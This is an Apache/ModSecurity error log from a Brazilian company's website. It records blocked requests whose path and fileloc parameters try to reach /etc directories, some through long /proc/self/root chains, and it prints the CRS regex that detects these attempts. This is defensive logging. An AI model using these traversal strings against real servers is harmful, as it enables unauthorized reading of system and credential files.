[Fri Mar 20 07:38:38.634932 2026] [:error] [pid 7235:tid 140411674785536] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrvqxLDW4GITHUkTiogAAAQg"]
[Fri Mar 20 07:38:38.759016 2026] [:error] [pid 26799:tid 140411666392832] [client 216.73.216.191:57756] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrta6ubjKNq_cu4bQPwAAA0k"]
[Fri Mar 20 07:38:38.769868 2026] [:error] [pid 7235:tid 140411557287680] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrvqxLDW4GITHUkTipAAAARY"]
[Fri Mar 20 07:38:38.899081 2026] [:error] [pid 11167:tid 140411599251200] [client 216.73.216.191:11364] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrvHIg5MgXLBnicPz1QAAAdE"]
[Fri Mar 20 07:38:38.900360 2026] [:error] [pid 26799:tid 140411616036608] [client 216.73.216.191:57756] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrta6ubjKNq_cu4bQQAAAA08"]
[Fri Mar 20 07:38:38.907276 2026] [:error] [pid 7235:tid 140411548894976] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrvqxLDW4GITHUkTipQAAARc"]
[Fri Mar 20 07:38:40.373411 2026] [:error] [pid 21219:tid 140411708356352] [client 216.73.216.191:23691] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrvXLqtnMIWvjpaKWLwAAAoQ"]
[Fri Mar 20 07:38:40.375626 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:44052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jr11pVZ5mVmJwsFMsIAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:38:40.376490 2026] [:error] [pid 15826:tid 140411590858496] [client 216.73.216.191:7458] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jr-oXxyEfFpUF8f99UQAAAVI"]
[Fri Mar 20 07:38:40.381267 2026] [:error] [pid 11167:tid 140411708356352] [client 216.73.216.191:13535] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrvHIg5MgXLBnicPz1gAAAcQ"]
[Fri Mar 20 07:38:40.382580 2026] [:error] [pid 10189:tid 140411632822016] [client 216.73.216.191:1160] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrzJ3M9BSuKP7CAYWkgAAAI0"]
[Fri Mar 20 07:38:40.384157 2026] [:error] [pid 11167:tid 140411733534464] [client 216.73.216.191:11364] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jr_HIg5MgXLBnicPz1wAAAcE"]
[Fri Mar 20 07:38:40.385437 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:57756] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jr9a6ubjKNq_cu4bQQgAAA0w"]
[Fri Mar 20 07:38:40.386610 2026] [:error] [pid 31215:tid 140411733534464] [client 216.73.216.191:2287] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsAF0L0L-SsrnPo5kkQAAAsE"]
[Fri Mar 20 07:38:40.389663 2026] [:error] [pid 21219:tid 140411666392832] [client 216.73.216.191:50259] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsPXLqtnMIWvjpaKWMgAAAok"]
[Fri Mar 20 07:38:40.397096 2026] [:error] [pid 31215:tid 140411548894976] [client 216.73.216.191:18731] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jrwF0L0L-SsrnPo5kjwAAAtc"]
[Fri Mar 20 07:38:40.400495 2026] [:error] [pid 7235:tid 140411741927168] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsPqxLDW4GITHUkTiqAAAAQA"]
[Fri Mar 20 07:38:40.551929 2026] [:error] [pid 7235:tid 140411683178240] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsPqxLDW4GITHUkTiqQAAAQc"]
[Fri Mar 20 07:38:40.655102 2026] [:error] [pid 31215:tid 140411716749056] [client 216.73.216.191:18731] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsAF0L0L-SsrnPo5kkgAAAsM"]
[Fri Mar 20 07:38:40.753314 2026] [:error] [pid 7235:tid 140411641214720] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsPqxLDW4GITHUkTiqgAAAQw"]
[Fri Mar 20 07:38:40.859019 2026] [:error] [pid 31215:tid 140411641214720] [client 216.73.216.191:18731] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsAF0L0L-SsrnPo5kkwAAAsw"]
[Fri Mar 20 07:38:42.306189 2026] [:error] [pid 11642:tid 140411741927168] [client 216.73.216.191:33407] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsLninkcc-iUj5AparwAAA4A"]
[Fri Mar 20 07:38:42.315813 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:18731] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsgF0L0L-SsrnPo5klQAAAtM"]
[Fri Mar 20 07:38:42.319781 2026] [:error] [pid 7235:tid 140411632822016] [client 216.73.216.191:59396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jsfqxLDW4GITHUkTiqwAAAQ0"]
[Fri Mar 20 07:38:45.087686 2026] [:error] [pid 9818:tid 140411548894976] [client 216.73.216.191:46554] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jtV1pVZ5mVmJwsFMsJAAAAFc"]
[Fri Mar 20 07:38:52.865668 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:54268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jvBCii7xarUs8iHZj6QAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:38:57.118508 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:59244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0jvzJ3M9BSuKP7CAYWqwAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:39:04.738940 2026] [mime_magic:error] [pid 31215:tid 140411557287680] (70014)End of file found: [client 57.141.18.77:47710] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:39:08.605828 2026] [mime_magic:error] [pid 31215:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:48002] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
